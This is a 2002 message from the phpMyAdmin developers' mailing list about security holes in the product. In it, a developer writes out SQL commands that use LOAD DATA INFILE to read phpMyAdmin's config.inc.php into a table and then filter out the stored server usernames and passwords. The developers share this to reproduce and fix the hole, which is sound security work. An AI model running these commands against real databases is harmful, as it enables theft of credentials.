At 13:12 12.08.2002 -0700, you wrote:
On Mon, 12 Aug 2002, Marc Delisle wrote:
On Mon, 12 Aug 2002, Marc Delisle wrote:
I've just merged a fix against that, but it needs some testing
since I do
not have a machine here which is affected by this securety hole.
you won't like me, but I think we should wait to include a fix for a "hole" until a developer can reproduce it.
I'm going to set up a copy of PMA that exhibits the security hole for us to test out bug. Give me a day or two, as I have some more pressing work at the moment.
Robin,
the "goto" problem?
Marc
I've checked out the goto problem, and you were right, it is fixed in the recent releases. It now limits you to files only in the phpMyAdmin install directory. Which can still be a problem in itself I think.
On checking out the other problem with systems totally open using the config mechanism, try out this series of SQL Commands:
First time around: CREATE TABLE testB ( t mediumtext ); LOAD DATA INFILE '/home/robbat2/public_html/PMA/config.inc.php' INTO TABLE testB FIELDS TERMINATED BY '\n' LINES TERMINATED BY '\n';
Where you need to change the path of the file, and the 'TERMINATED BY' parts for your own systems.
When that completes, I ran this: SELECT * FROM testB WHERE t like '%Server%' AND (t like '%user%' or t like '%password%');
To get just the PMA authentication data.
Of course, this exploit requires that the user have the FILE privilege.
AND Create Rights on MYSQL as well ;-)) at least somethere ;-)
This would apply to all cases where PMA has been set up with the user as root, or anybody else with the FILE privilege.
I'm carrying on looking for more holes along these lines.
-- Robin Hugh Johnson E-Mail : robbat2@orbis-terrarum.net Home Page : http://www.orbis-terrarum.net/?l=people.robbat2 ICQ# : 30269588 or 41961639
This sf.net email is sponsored by: Dice - The leading online job board for high-tech professionals. Search and apply for tech jobs today! http://seeker.dice.com/seeker.epl?rel_code=31 _______________________________________________ Phpmyadmin-devel mailing list Phpmyadmin-devel@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/phpmyadmin-devel